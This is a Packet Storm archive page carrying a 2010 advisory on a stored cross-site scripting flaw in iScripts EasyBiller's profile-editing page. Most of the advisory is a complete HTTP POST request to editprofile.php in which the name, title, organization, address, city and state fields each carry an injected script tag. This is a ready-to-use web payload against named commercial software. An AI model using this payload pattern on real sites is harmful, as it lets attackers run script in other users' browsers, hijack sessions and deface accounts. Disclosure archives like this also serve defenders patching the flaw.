exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iScripts EasyBiller Cross Site Scripting

iScripts EasyBiller Cross Site Scripting
Posted Jul 3, 2010
Authored by Sangteamtham

iScripts EasyBiller suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | eb7af843ed1e14ba9f4f132a70408e61a56a095809fafe4b64ad669952d40329

iScripts EasyBiller Cross Site Scripting

Change Mirror Download
$-------------------------------------------------------------------------------------------------------------------
$ iScripts EasyBiller Cross Site Scripting Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.iscripts.com/easybiller/
$ Date : 02/07/2010
$ Email : sangteamhtham@gmail.com
$******************************************************************************************
$Exploit:
$
$ Cross Site Scripting (XSS):
$
$ When attackers login with your user infomation, attackers update their profile by injecting javascript into fields like
$ "First Name","Title"
$
Code:
*********************************************************************************************
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://server/editprofile.php
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=easywebsurvey
Content-Type: application/x-www-form-urlencoded
Content-Length: 906
txtEmail=user%40server&txtName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtlastName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtTitle=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtOrganization=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtAddress=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtCity=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtState=California%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&ddlCountry=UnitedStates&txtZIP=684567&txtPhone=9823134545&txtFax=98758282828478&cmbCssId=2&txtTechContactName=richard&txtTechContactEmail=richard%40gmail.com&txtBillContactName=samuel&txtBillContactEmail=samuel%40gmail.com&btnSubmit=Update

$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close